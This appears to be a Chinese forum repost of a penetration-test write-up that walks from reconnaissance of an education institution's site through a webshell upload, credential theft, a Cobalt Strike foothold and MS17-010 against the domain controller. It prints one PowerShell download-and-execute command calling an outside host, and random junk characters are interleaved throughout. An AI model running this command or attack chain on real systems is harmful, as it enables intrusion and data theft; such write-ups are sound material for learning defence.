|
, N7 o. W) z" F2 P+ D 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
8 ^1 k8 w# R* y5 o5 r # p5 V: a5 [: E* J3 a
6 @7 O |2 o4 P/ [( `
7 D0 P U/ F5 ?6 F, _* h* W
" d; C( S2 p) l9 T
1 F$ A% D4 {4 R9 G9 k$ |) @ 正文
( `3 L6 E3 o, S0 w% } 9 g9 T( v) Z) ? E: v7 f) \
. G4 N, p z+ p4 y/ T9 j
$ `+ Y* w8 \4 A
2 z, q5 w; L$ Q0 h9 y6 H" m) F s% r7 z6 {* g# H
目标:www.xxxx.com(一家教育机构)
0 f: L% Z0 n- j, L9 g
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
4 h: X0 S1 m1 l* o0 ~
, b/ W: n: f9 Z; Y* a, C% I
+ r$ b0 B! h5 n1 b% J: O5 ~ 
( d4 a+ r+ z U9 m: m ' Y1 b1 _* L0 |7 f3 m! {
# T3 m" z+ f% ] F% B" G3 A 进行了简单的信息搜集
6 q% ?" q. g0 G! }, O9 W7 k
6 z/ g" s; q* s$ C% k4 B5 p& D: G# I1 m9 U0 d, s# G3 c. y
2 C1 p3 V1 U* H3 `3 K; y9 X. |4 Z1 \
子域名搜集
7 I4 P- V7 B! a 2 s: h! S- E! j6 |- i
+ ~" a p- ]2 | e6 Q 
' h8 |# K. e* @
9 S, u- e- }! d
: p/ d5 R& r% [ C# b fofa找资产
% v% U6 H5 r! V' ?
% x" M" g3 S, j' B. I: D/ K5 h1 V& k+ g" W" f
" |4 D6 \- y6 E& S! _: H7 s
3 z! P2 C( h- J 
, F3 q3 H1 n ~# Z9 k; X
6 }# P$ Y* v. }- }8 `3 o0 j0 d6 |% F
# U# f1 x1 _9 d: m2 ^% b! A+ ?; c 一共七个资产。去重之后只有两个。
$ O) r6 I9 S+ {4 O
- w/ Q$ R8 @$ \* b
7 A" I# }& C$ \' q
- _0 @9 U) A# m% G" ^: l) `: U( i: i! \8 D! ?
目录探测* K7 I# E/ ]3 _5 m7 X: ?! K+ M
4 e: M( p+ X; U1 X# p
% y6 v$ L7 k7 b 
h6 F w3 v, \. | 7 X* x, u8 d! |/ `+ s
' ]; F( n( [8 [" A 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
: q6 D3 a. M( v# L
, b2 h9 Q9 b4 H. C0 S* ~
: Y8 H4 `3 H0 ~7 @) r' v
8 x$ }) n8 W6 I# Q
0 K1 y6 ~( A! q2 y 我又尝试了通过修改返回包来绕过登录界面4 F9 C+ n4 `: z( {$ @- c8 ?
1 s8 j3 ?% N' `; h$ _6 B( x
# H# Z) k% F' T, u& B  5 v9 L: c& O' Z, G, y( b
2 w! M: P5 ^4 }, n
; R0 D9 Y, |" z
还是不行,尝试注入无果2 J: r$ o7 Z( Z# r0 M
. T; q& `3 y% _; n. F" p2 {+ c3 x5 b _9 o
& d+ L" H) ?2 z$ v . }) k% k9 x/ E4 o* A+ S
7 N3 k* G9 a; c* V+ b 不过我目录探测出了一处Spring信息泄露
3 J8 A' f7 t3 A7 @
% s$ D* C' L3 c9 \8 `! w
2 T& Q5 N* v+ }+ h1 M5 U
- K$ @) N. x, O4 N7 w( F
* A( K1 s9 Z5 a6 X7 c" t 
# P2 j0 c; A$ e- O# i9 K- {
" R3 P5 Q C3 t& S0 B
" ^; v, o4 k, Z/ t2 V 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录9 p7 z* f2 S7 N1 G4 J
6 P% p# _! H9 O0 b- q8 k4 B5 x1 I& t6 @9 o- F* v6 u
9 U( F% \: H5 v8 P' s' l 9 G* P, e# c! a' s5 y
/ C8 G$ n4 W2 ]2 W 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& m& B. [' y7 D- }, a- b7 Q
' p' @5 y; x4 }7 [$ r3 @
, j2 W9 O' E2 K9 `6 t+ s! Q4 j% a 
7 {4 \5 k5 r$ @2 d3 `& |& v& `' M
( o/ k' \0 j# c. S( S3 @
6 ^* P0 [' w( t3 s- }) {$ L 获取有些师傅到这一步就手机抓包电脑测了。+ r/ A% e q3 D8 Y" c, @. ]! k- S* F
; S' A, r' v2 `2 a. c4 g" \8 _7 {" ?6 c( z9 c5 N* y) {+ N
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
4 l) Q n' q/ w! m$ d8 [
+ c4 f4 ?1 I; O* L+ i5 ]" ?, `0 S+ A2 F
其中在一个公众号发现了小程序,可以进行注册。8 h, a- C$ ~+ b- x4 i. m
8 L9 f, M: _/ G: i+ [6 S% N4 S: F" `) t# n
看到了头像上传,尝试上传获取WebShell. n% ?( H! h; o, ?/ r" k. i% O
( N `% |9 j0 m( W8 U2 H) R9 V. C0 m9 z' T
/ r5 [" x1 v3 ^5 V3 W+ \1 z
 - h' a( `( h; E- ^
; |. k- D m. c; j5 ~5 }- P
- Z* S- d( |% Q5 w- C+ o& j
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问1 k6 E* `' n% D( {1 \- u9 }
% P m6 M$ A6 d
; L) J. m6 F/ p9 V( b) a
 + M. D) G0 k" B& Y5 n5 g7 E9 y; O
' s* E9 ?% ~3 U! E7 y' Z
0 f0 _+ Z$ ^1 R% B6 m 然后上了大马
5 P, `9 n `- R6 [1 O7 x" o( n7 Z3 j
# w3 ?! F8 k: N- z( O( A; S8 _9 y) n! g& m$ F
 9 I4 r0 D' I7 S" A, p) I! v
; K. b" d# O. `9 ]7 |" C) ~+ o
& z# ^0 R3 X) H1 g! }# L; v# _# c$ O
 2 R/ B- B) ~3 E# v# r
/ [5 ^5 N6 [8 T/ f3 k" }; |( I- I- L
7 ?1 D7 R. w& b) X 通过翻找文件发现数据库账号密码- v0 x2 K1 S* E7 N
% \/ W: N) I4 C
9 S# z% u \9 c" S7 S 
) U4 K$ i- m3 }$ U X' h$ [$ L : M0 F5 Y, a8 a6 W
- Q; U1 M8 @7 G- g6 [ --内网渗透0 ]6 `8 B. i8 x/ L7 Q
9 W2 K9 p8 F7 p g
& P" V) y% C; a2 T) C 直接通过powershell执行 cs上线2 S& b2 P; K( ?/ ]) i
7 v$ n; l5 r5 k7 T) D
8 W% I ~3 X# e powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
- a' \5 R" i* p6 Z6 J) J ' S) P7 w% O. p; p
9 b- o) X2 R2 P% q8 S+ U
 . J5 |) \- J5 G5 L: ~) B" ?1 Q
5 ~3 B% `$ C4 o
$ J, D" [1 x* Y1 C: W 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, T; t2 k+ p# [9 k! n9 c
8 ?; \" M+ x8 t7 ]; V% ^" P1 A6 ]0 X$ R7 s3 p; G
 $ ?4 F+ c. A0 N4 Q' ]
* X" T+ B! z& _
, w6 W# n- A [$ R+ L 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
# F8 s1 F" l9 }! i h
1 N! x- J0 e* g0 C/ i
3 q2 N3 q- J; i e/ S- t7 L
4 a. v$ [; g4 K# h4 V Q) q' ^
4 i4 V2 z, N5 G1 g9 b5 D* y+ M1 T M3 P: h1 A
 ( ~( S3 S+ E( ^2 |2 L4 o9 X/ T2 C
& V* w! u* |6 W# Y# M' _4 R; ?7 K' X; y5 F J
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
3 d& i# }* ~7 E' Z
* n& D5 j& N) S$ u
/ w8 X2 j& y! O, [, z# {
* }& P7 A' r3 _" r3 g0 s f [5 v3 C- g: c
) a- z, t# R) h3 O1 S " o0 f! g3 t0 E6 I6 a4 R8 W
' K, e8 i9 x3 e/ p! h
1 n% V9 }' T$ |9 `( u
' w# U: w& ]4 P' z1 f$ w! N$ w2 s: l7 G. m2 ^
& h# }1 m R+ R2 ^" o' u# q7 ]' a7 h' |0 ^, l2 a; b
% s* H/ G* W8 i# |4 H
4 g/ y9 U& d% p0 Y$ a8 H5 `, W5 H5 |8 M b4 N, P8 H
小结+ n8 F& j R- w' ~0 O& u( S
~( I* w0 V1 c% _, ^9 i2 C4 k8 j/ l5 ~+ b3 K9 U% c8 ]1 v
/ f# A- ?2 F! \9 I$ O3 p/ K
8 o5 \# e% v" ]" U7 Z5 v/ G$ g7 @% I( s
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
+ w6 T, o% ]. d, Y ' L7 ~7 G( z3 y3 M8 B) j
J( g/ ?9 J0 O, R6 F
$ Y- `! Q" F D9 p' {" o
: Y: D q* Z3 I8 T. V; @
3 n, a! R) z1 ^% e -
/ I$ i; D j6 @ 4 c' U* P' w9 {. M" ?
9 y' N2 }+ j9 L
-
: ?/ C ~+ R2 E2 y
% g$ A- x$ z2 t' G$ D/ l1 f Z3 n
3 g0 g4 R4 F E! Q
3 |" D, f2 u$ y9 b% y
9 p3 K6 K4 h+ Y3 |# F9 n 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 P+ q6 Z- {1 `8 H" m1 J
0 v2 @7 {- m6 O/ S% C; B [* }$ o8 u6 B) O( a
, e& K0 t0 _! S) y' C }5 w- D, v
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对